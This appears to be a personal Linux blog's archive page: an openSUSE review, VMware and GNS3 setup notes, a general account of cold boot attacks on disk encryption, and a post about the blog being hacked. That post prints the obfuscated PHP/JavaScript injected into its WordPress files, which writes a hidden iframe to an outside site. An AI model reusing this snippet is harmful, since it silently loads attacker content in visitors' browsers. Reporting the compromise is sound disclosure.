Category Archives: Linux

openSUSE 11.1

openSUSE 11.1 is out and already on all my desktop PC.

This distribution is, by far, the best Linux environment for a desktop PC : very stable, up to date, polished, professional…

I also appreciate the huges improvements made on Yast and the package management system. Despite being an advanced user that like to use the command line, I reallly appreciate sometimes to have a nice graphical frontend that just do what I want easely and quickly.

openSUSE 11.1 deserves its increasing popularity. Really, give it a try !

VMWare Workstation 6.5

I have just upgraded WMWare from version 6.04 to 6.5, and I have to say that it has very nice new features.

The first surprising thing was the file I downloaded. It is now not anymore a tar.gz archive but a .bundle file.

After downloading, as root, just make it executable or start it with sh :

% sh VMware-Workstation-6.5.0-118166.x86_64.bundle

It now starts a graphic installer, that takes care of everything. All the compilation process is now hidden to the user.

I was expecting the compilation to fail and that I would have to look for a patch to run on my edge Linux kernel. Indeed, I just compiled 2.6.26 kernel (64 bits) a few days ago.

But nothing like that. the process went smoothly.

However, I was still prudent. Even after a compiling, previous versions almost always required some patch to get full networking to work.

So I gave a try and launch one of my virtual machines. Surprise : all worked out of the box !

For the first time, I even did not need any vmware-any-any patch or any network patched vmmon and vmnet modules to get wifi networking operational.

I also quickly noticed some very nice and fancy features :

  • 3D graphics support
  • more devices supported : fingerprint reader device, audio driver for Vista, …
  • a graphical virtual network settings editor : this utility had been for ages on the Windows version and finally will make your easier on Linux

At last, but not least, the Unity display mode.

Though I am not a Mac user, I believe this can be compared to VMWare Fusion. Anyway, it allows you to display the virtual machines programs within your X session.

Look at this screenshot :

VMWare Workstation 6.5 and Unity

The result is quite spectacular. On my Gnome desktop, I am now able to display some windows from Windows XP and Windows Vista.

Well, this is not yet perfectly smooth or artifact free, but this is already really usable and responsive enough to be used intensively.

Another limit is the operating system support. So far, among my virtual machines, I was able to do it with Windows systems but not Open Solaris for instance.

There must have been more improvements, more or less visible, that I am not aware of. I won’t go for a full review.

I just wanted to insist that if you are a VMWare user,  you really should consider to upgrade for the complete support of the latest kernel and the Unity feature.

It seems that VMWare has listened to the Linux users, or at least is taking it more seriously. Not that they are nice, but the competitors are close (Virtual box, KVM, Xen…) !

Practicing Cisco networking with GNS3 and Dynamips

GNS3 and Dynamips put together give a nice open-source and free alternative to emulate a network with IOS routers. Dynampis is an emulator of Cisco 7200 router, while GNS3 provides a nice graphical environment to design your network and use the virtual routers.

I sometimes use Boson Netsim, which is not only non-free but not so reliable.

However, as I just started to use GNS3 and Dynamips, I don’t know it so well yet and won’t compare any further the two solutions.

On this page, I am just summarizing the few steps to set it up on your Linux system.

First, set up the prerequisite :

$ aptitude install python-qt4

Now, go to gns3.net and download the source code for Linux (direct link).

You may extract the archive in your local application folder :

$ wget http://pfe.epitech.net/frs/download.php/819/GNS3-0.5-src.tar.gz
$ tar -xzvf GNS3-0.5-src.tar.gz -C /opt

Then, you need the dynamips binary from the dynamips blog (direct links for x86 or amd64 platforms).
The file must be executable.

$ wget http://www.ipflow.utc.fr/dynamips/dynamips-0.2.8-RC2-amd64.bin
$ chmod u+x dynamips*.bin
$ mv dynamips-0.2.8-RC2-amd64.bin /opt

Now, start GNS3 :

$ /opt/GNS3-0.5-src/gns3

In the edit menu, select preferences and go the dynamips section.

Just browse to the dynamips binary you dowloaded, to fill the value of the executable path field.

Still from the edit menu, select IOS images and hypervisors. There, you have to add all the IOS images you want to use, one after another. Normally, the default settings for each file loaded are suitable.

Back to the main window, you can drag and drop routers and link them, creating the topology you wish.

For now, just add one router. Right click on it and select start to start it up. Right click again and select console.

Enjoy ! Of course, I strongly recommand that you start reading further from this page.

Resources :

http://www.ipflow.utc.fr/blog/
http://www.gns3.net/
http://www.blindhog.net/tutorials/gns3-linux-install/gns3-linux-install.html

Hacked !

This blog got hacked yesterday.

It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.
It was not just like the classic SQL injection that is usually used to post some malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Continue reading

Cold boot attack, not a threat to Full disk encryption (FDE)

Since the new cold boot attack hack is on the news, touching most of the software encryption solutions, I have wondered if it had any chance to concern also hardware encryption.

Hardware encryption is provided by a few laptop makers, generally on high-range an business models.

It has much less performance impact than software encryption, and protect the data independently from your system configuration and its partitions.

Full disk encryption is the so called hardware encryption technology used by Lenovo on my Thinkpad.

Continue reading

Disk encryption methods : hacked !

Damned !

A team of researchers found a way to defeat all the most common disk encryption methods – including dm-crypt for Linux that I previously described on this blog.

A team of researchers found a way to defeat all the most common disk encryption methods – including dm-crypt for Linux that I previously described on this blog.

All systems are actually concerned, because the attack is low level. It is based on the RAM chips properties. After shutdown, and therefore no more electricity powering, a chip will still contain some readable information during a few seconds.

The data contained is deteriorating, but for example if you cool the chip enough, for example with a computer dry air dust cleaner, you can keep the data several minutes !

The problem concerning data encryption is that the decryption key is kept in RAM, and that way be stolen to read all your data.

The attack would not so easy in practice, if suspend-to-ram did not exist.

But as many users, including me, use heavily suspend-to-ram with their laptop, this issue is rather problematic…

The team provides a rather impressive video :

I no longer use dm-crypt since my Thinkpad provides hardware encryption, but I wonder now where the key is stored in my case. I don’t think it is in RAM, but I have to check it to make sure.I will do it tomorrow, since I need to rest now.